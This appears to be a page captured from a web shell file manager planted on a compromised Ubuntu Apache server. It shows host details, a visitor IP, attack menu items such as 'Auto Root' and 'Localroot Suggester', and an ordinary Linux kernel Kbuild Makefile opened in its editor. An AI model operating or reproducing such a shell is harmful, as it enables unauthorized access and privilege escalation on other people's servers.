Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
linux-headers-4.4.0-119 /
scripts /
mod /
Delete
Unzip
Name
Size
Permission
Date
Action
.gitignore
55
B
-rw-r--r--
2016-01-11 00:01
Makefile
1.28
KB
-rw-r--r--
2016-01-11 00:01
devicetable-offsets.c
5.72
KB
-rw-r--r--
2016-01-11 00:01
empty.c
54
B
-rw-r--r--
2016-01-11 00:01
file2alias.c
39.97
KB
-rw-r--r--
2018-04-02 18:07
mk_elfconfig.c
1.2
KB
-rw-r--r--
2016-01-11 00:01
modpost.c
65.29
KB
-rw-r--r--
2016-01-11 00:01
modpost.h
4.81
KB
-rw-r--r--
2016-01-11 00:01
sumversion.c
11.93
KB
-rw-r--r--
2016-01-11 00:01
Save
Rename
hostprogs-y := modpost mk_elfconfig always := $(hostprogs-y) empty.o modpost-objs := modpost.o file2alias.o sumversion.o devicetable-offsets-file := devicetable-offsets.h define sed-y "/^->/{s:->#\(.*\):/* \1 */:; \ s:^->\([^ ]*\) [\$$#]*\([-0-9]*\) \(.*\):#define \1 \2 /* \3 */:; \ s:^->\([^ ]*\) [\$$#]*\([^ ]*\) \(.*\):#define \1 \2 /* \3 */:; \ s:->::; p;}" endef quiet_cmd_offsets = GEN $@ define cmd_offsets (set -e; \ echo "#ifndef __DEVICETABLE_OFFSETS_H__"; \ echo "#define __DEVICETABLE_OFFSETS_H__"; \ echo "/*"; \ echo " * DO NOT MODIFY."; \ echo " *"; \ echo " * This file was generated by Kbuild"; \ echo " *"; \ echo " */"; \ echo ""; \ sed -ne $(sed-y) $<; \ echo ""; \ echo "#endif" ) > $@ endef $(obj)/$(devicetable-offsets-file): $(obj)/devicetable-offsets.s $(call if_changed,offsets) targets += $(devicetable-offsets-file) devicetable-offsets.s # dependencies on generated files need to be listed explicitly $(obj)/modpost.o $(obj)/file2alias.o $(obj)/sumversion.o: $(obj)/elfconfig.h $(obj)/file2alias.o: $(obj)/$(devicetable-offsets-file) quiet_cmd_elfconfig = MKELF $@ cmd_elfconfig = $(obj)/mk_elfconfig < $< > $@ $(obj)/elfconfig.h: $(obj)/empty.o $(obj)/mk_elfconfig FORCE $(call if_changed,elfconfig) targets += elfconfig.h